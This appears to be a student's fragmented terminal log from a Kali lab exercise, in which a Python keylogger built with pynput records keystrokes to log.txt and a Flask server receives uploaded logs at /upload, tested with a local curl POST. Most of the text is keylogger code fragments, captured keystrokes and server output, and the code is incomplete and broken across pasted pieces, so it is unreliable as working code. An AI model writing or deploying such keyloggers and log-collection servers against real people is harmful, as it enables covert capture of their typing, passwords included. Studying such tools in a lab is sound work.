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mkdir keyloger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└─$ cd keyloger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┌──(kali㉿Kali)-[~/keyloger]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└─$ touch main.py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┌──(kali㉿Kali)-[~/keyloger]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└─$ pip3 install pynput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Collecting pynput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Downloading pynput-1.8.2-py2.py3-none-any.whl.metadata (32 kB)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Requirement already satisfied: six in /usr/lib/python3/dist-packages (from pynput) (1.17.0)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Collecting evdev&gt;=1.3 (from pynput)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Downloading evdev-2.0.0.tar.gz (33 kB)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Installing build dependencies ... done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Getting requirements to build wheel ... done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Preparing metadata (pyproject.toml) ... done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Collecting python-xlib&gt;=0.17 (from pynput)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Downloading python_xlib-0.33-py2.py3-none-any.whl.metadata (6.2 kB)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Downloading pynput-1.8.2-py2.py3-none-any.whl (92 kB)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Downloading python_xlib-0.33-py2.py3-none-any.whl (182 kB)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Building wheels for collected packages: evdev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Building wheel for evdev (pyproject.toml) ... done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Created wheel for evdev: filename=evdev-2.0.0-cp314-cp314-linux_x86_64.whl size=113656 sha256=5596b1fa2588ab28d43cfbe87c952835237263ab5528690f1164d083e48da866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Stored in directory: /home/kali/.cache/pip/wheels/fe/84/19/f44d321c9372e5de3422d8759a4cb58be5e3f7218de49a4158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Successfully built evdev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Installing collected packages: python-xlib, evdev, pynput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Successfully installed evdev-2.0.0 pynput-1.8.2 python-xlib-0.33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┌──(kali㉿Kali)-[~/keyloger]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└─$ &gt;....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saved_keys = []  # Reset saved keys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char_count = 0  # Reset character count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saved_keys.append(key)  # Add the pressed key to the list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char_count += 1  # Increment character count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write_to_file(keys: List[str]):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Writes recorded keystrokes to a log file ('log.txt').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Filters out keys that contain the word 'key' (e.g., Key.shift).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with open("log.txt", "a") as file:  # Open the log file in append mode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for key in keys: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key = str(key).replace("'", "")  # Remove single quotes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if "key".upper() not in key.upper():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# Ignore special keys like 'Key.shift'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file.write(key)  # Write the key to the log file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file.write("\n")  # Add a newline after each set of recorded keys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Start the keylogger using the Listener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with Listener(on_press=on_key_press, on_release=on_key_release) as listener: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print("Start key logging...")  # Notify that logging has started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listener.join(timeout=30*60)  # Run for 30 minutes (60 sec * 30 min)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print("End key logging...")  # Notify that logging has ended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zsh: parse error near `elif'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┌──(kali㉿Kali)-[~/keyloger]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┌──(kali㉿Kali)-[~/keyloger]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└─$ nano main.py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┌──(kali㉿Kali)-[~/keyloger]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└─$ python3 main.py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Start key logging...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xKey Pressed:  'x'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Key Pressed:  'c'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cKey Pressed:  'd'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dKey Pressed:  'u'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uKey Pressed:  'i'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iKey Pressed:  'i'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iKey Pressed:  'u'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uKey Pressed:  'f'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fKey Pressed:  'd'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dKey Pressed:  'l'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lKey Pressed:  's'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sKey Pressed:  'l'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lKey Pressed:  'h'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Key Pressed:  'i'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Key Pressed:  's'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Key Pressed:  't'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Key Pressed:  'o'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Key Pressed:  'r'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Key Pressed:  'y'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Key Pressed:  Key.space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Key Pressed:  'g'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Key Pressed:  'r'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Key Pressed:  'e'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Key Pressed:  'f'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Key Pressed:  'i'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Key Pressed:  'n'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Key Pressed:  'd'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Key Pressed:  Key.space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Key Pressed:  'x'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Key Pressed:  'l'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Key Pressed:  'o'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Key Pressed:  'g'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Key Pressed:  '.'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Key Pressed:  't'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Key Pressed:  'x'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Key Pressed:  't'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Key Pressed:  Key.ctrl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Key Pressed:  Key.shift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Key Pressed:  'V'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Key Pressed:  '2'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Key Pressed:  '8'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Key Pressed:  Key.shift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Key Pressed:  'J'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Key Pressed:  '6'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Key Pressed:  '1'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Key Pressed:  'v'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Key Pressed:  Key.shift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Key Pressed:  'F'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Key Pressed:  '1'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Key Pressed:  'd'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Key Pressed:  'f'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Key Pressed:  'f'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Key Pressed:  'd'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Key Pressed:  'f'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Key Pressed:  'f'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Key Pressed:  '2'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Key Pressed:  '8'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Key Pressed:  Key.shift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Key Pressed:  'J'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Key Pressed:  '6'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Key Pressed:  '1'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Key Pressed:  'v'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Key Pressed:  Key.shift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Key Pressed:  'F'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Key Pressed:  '1'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Key Pressed:  'c'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Key Pressed:  'd'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Key Pressed:  Key.space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Key Pressed:  'k'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Key Pressed:  'e'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Key Pressed:  'y'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Key Pressed:  Key.shift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Key Pressed:  '_'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Key Pressed:  'l'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Key Pressed:  'o'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Key Pressed:  'g'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Key Pressed:  'e'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Key Pressed:  'r'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Key Pressed:  'l'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Key Pressed:  's'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Key Pressed:  'c'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Key Pressed:  'a'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Key Pressed:  't'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Key Pressed:  Key.space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Key Pressed:  'l'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Key Pressed:  'o'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Key Pressed:  'g'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Key Pressed:  Key.space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Key Pressed:  Key.backspace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Key Pressed:  '.'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Key Pressed:  't'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Key Pressed:  'x'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Key Pressed:  't'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Key Pressed:  Key.enter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Key Pressed:  Key.ctrl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Key Pressed:  Key.shift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Key Pressed:  'C'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└─$ find log.txt                                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find: ‘log.txt’: No such file or directory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└─$ sudo find / -type f -name "log.txt" 2&gt;/dev/null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[sudo] password for kali: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/home/kali/SecLists/Discovery/Web-Content/File-Extensions-Universal-SVNDigger-Project/context/log.txt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/home/kali/keyloger/log.txt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└─$ cd keyloger        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┌──(kali㉿Kali)-[~/keyloger]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log.txt  main.py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┌──(kali㉿Kali)-[~/keyloger]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└─$ cat log.txt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xciduidfulslhistory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grefind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xlog.txt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28j61vF1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dfdfff28j61vf1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key_loger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cat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log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┌──(kali㉿Kali)-[~/keyloger]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Logger on Server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└─$ mkdir lab13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└─$ cd lab13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└─$ touch server.py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server.py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└─$ nano server.py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└─$ python3 server.py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* Serving Flask app 'server'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* Debug mode: off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WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.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* Running on all addresses (0.0.0.0)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* Running on http://127.0.0.1:5000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* Running on http://10.0.2.15:5000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Press CTRL+C to quit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=== Received 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hello from test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127.0.0.1 - - [12/Oct/2026 02:50:58] "POST /upload HTTP/1.1" 200 -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=== Received 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dfdhello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myfriend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doyou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listen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to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me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127.0.0.1 - - [12/Oct/2026 02:58:40] "POST /upload HTTP/1.1" 200 -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└─$ cd lab13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keyloger  received_logs.txt  server.py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└─$ cat received_logs.txt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hello from test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└─$ cd ..            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└─$ cd lab13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keyloger  received_logs.txt  server.py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└─$ cat received_logs.txt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hello from test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┌──(kali㉿Kali)-[~/lab13]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(ls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358  nano main.py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359  python3 main.py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360  curl -X POST http://127.0.0.1:5000/upload -d "hello from test"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361  cd lab13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362  ls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363  mkdir keyloger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364  cd keyloger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365  ls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366  touch main.py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367  nano main.py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368  python3 main.py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369  mkdir lab13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370  cd lab13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371  touch server.py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372  ls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373  nano server.py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374  python3 server.py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375  cd lab13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376  ls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377  cat received_logs.txt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378  cd ..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379  cd lab13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380  ls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381  cat received_logs.txt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forgot to save my lines. So I decided to put here mu history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